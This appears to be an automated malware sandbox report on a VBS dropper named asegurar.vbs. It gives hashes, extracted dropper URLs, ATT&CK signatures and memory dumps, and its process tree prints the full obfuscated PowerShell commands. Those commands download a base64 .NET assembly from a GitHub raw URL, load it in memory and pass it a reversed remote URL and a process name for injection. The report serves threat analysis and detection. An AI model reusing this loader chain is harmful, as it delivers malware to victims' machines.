Overview

overview

10

Static

static

1

asegurar.vbs

windows7-x64

10

asegurar.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 13:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    asegurar.vbs

  • Size

    486KB

  • MD5

    fdcf96cf3407c66f4943f2253b16af72

  • SHA1

    e8d416d183f29e63e5938363b3a234b20b8ea107

  • SHA256

    96c7c3c8df1b8ddd33de8331f5f636c5bc7d0695b5d6cf22021c31d16f6f305f

  • SHA512

    b03dcde70b44ac7b6ec4c57e52f2e0b6be96362c50881953fcf05240e704b11adca440926a2bcc7d1d494ee4b8ffd527753982eb090a05f1ccbad009506802e8

  • SSDEEP

    12288:1BBQ2qtiJpZBdlB55pXRhDEBJ1bsXq8OnO5YWgVAjDcGS+e0W/5fyxJfd7ieMboV:5q+R2IUEF/N

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzaE9NZVs0XSskcFNIT21FWzM0XSsnWCcpKCgoJ3snKycyfXUnKydyJysnbCAnKyc9ICcrJ3snKycwJysnfScrJ2gnKyd0JysndHAnKydzOicrJy8nKycvcicrJ2F3LicrJ2dpdGgnKyd1YicrJ3VzZXJjb250JysnZW50LmMnKydvbS9ObycrJ0RldGUnKydjdE9uL05vRGV0ZScrJ2N0TycrJ24vJysncmVmcy8nKydoJysnZScrJ2Fkcy8nKydtYWknKyduLycrJ0QnKydldCcrJ2FoTm90JysnaC1WLnR4dHswJysnfTsgeycrJzJ9YmEnKydzZTYnKyc0Q28nKydudGVudCAnKyc9IChOZXctT2JqZScrJ2N0ICcrJ1MnKyd5Jysnc3QnKydlbS5OZXQnKycuV2ViQ2xpZScrJ250KS5Eb3duJysnbG9hZFN0cmknKyduZyh7Mn0nKyd1cmwpOycrJyAnKyd7Mn1iaScrJ24nKydhcicrJ3lDbycrJ250ZScrJ250ICcrJz0gW1N5cycrJ3QnKydlbS5DbycrJ252ZXJ0JysnXTo6RnJvbUJhc2UnKyc2JysnNFMnKyd0JysncicrJ2knKyduZycrJyh7Mn0nKydiYXNlNicrJzQnKydDbycrJ250ZW4nKyd0KTsgezInKyd9YXNzZW1ibHkgPSAnKydbJysnUicrJ2VmbGVjdGlvbicrJy5Bc3NlJysnbWInKydseV06OicrJ0xvJysnYWQnKycoezJ9YmluYXInKyd5QycrJ29udGVudCcrJyk7IFsnKydkbicrJ2wnKydpYi5JJysnTy5Ib20nKydlJysnXTo6VkFJKHsxfTAnKycvZTJpJysnbUInKycvJysnZC9lZS5ldCcrJ3NhcC8vJysnOicrJ3MnKydwJysndCcrJ3QnKydoezF9LCcrJyB7MX1kJysnZXNhdCcrJ2l2JysnYWRvJysnezF9JysnLCB7MX0nKydkZScrJ3NhdGl2JysnYWRvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWQnKydvezF9LCcrJyB7MX1BJysnZGRJblByb2NlcycrJ3MzMnsxfScrJywgJysnezF9JysneycrJzEnKyd9LCcrJ3sxfXsxfSknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzQsW2NIYXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PshOMe[4]+$pSHOmE[34]+'X')((('{'+'2}u'+'r'+'l '+'= '+'{'+'0'+'}'+'h'+'t'+'tp'+'s:'+'/'+'/r'+'aw.'+'gith'+'ub'+'usercont'+'ent.c'+'om/No'+'Dete'+'ctOn/NoDete'+'ctO'+'n/'+'refs/'+'h'+'e'+'ads/'+'mai'+'n/'+'D'+'et'+'ahNot'+'h-V.txt{0'+'}; {'+'2}ba'+'se6'+'4Co'+'ntent '+'= (New-Obje'+'ct '+'S'+'y'+'st'+'em.Net'+'.WebClie'+'nt).Down'+'loadStri'+'ng({2}'+'url);'+' '+'{2}bi'+'n'+'ar'+'yCo'+'nte'+'nt '+'= [Sys'+'t'+'em.Co'+'nvert'+']::FromBase'+'6'+'4S'+'t'+'r'+'i'+'ng'+'({2}'+'base6'+'4'+'Co'+'nten'+'t); {2'+'}assembly = '+'['+'R'+'eflection'+'.Asse'+'mb'+'ly]::'+'Lo'+'ad'+'({2}binar'+'yC'+'ontent'+'); ['+'dn'+'l'+'ib.I'+'O.Hom'+'e'+']::VAI({1}0'+'/e2i'+'mB'+'/'+'d/ee.et'+'sap//'+':'+'s'+'p'+'t'+'t'+'h{1},'+' {1}d'+'esat'+'iv'+'ado'+'{1}'+', {1}'+'de'+'sativ'+'ado{1}, {1}des'+'at'+'i'+'vad'+'o{1},'+' {1}A'+'ddInProces'+'s32{1}'+', '+'{1}'+'{'+'1'+'},'+'{1}{1})') -F [cHar]39,[cHar]34,[cHar]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2840

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    f25bd2e1d9f9fb65732279eca84a59c7

    SHA1

    1a84ab3d966019b212e04e549c000e1de5d29a33

    SHA256

    6ffd280a47a9ad3088f91b79a32c4714c2bc4222130a8247cbd1666cc9292aed

    SHA512

    1d54513c059548482095b8ac5e6e3bf6a1f77d39a91717d096e00552511fea29bb22ea6623665f0352bb5280a219b0b0dbd5363dddfa0dcad5e7c821280e39f7

    Download Submit

  • memory/1732-4-0x000007FEF633E000-0x000007FEF633F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1732-5-0x000000001B880000-0x000000001BB62000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1732-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1732-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1732-13-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1732-14-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

    Filesize

    9.6MB

    Download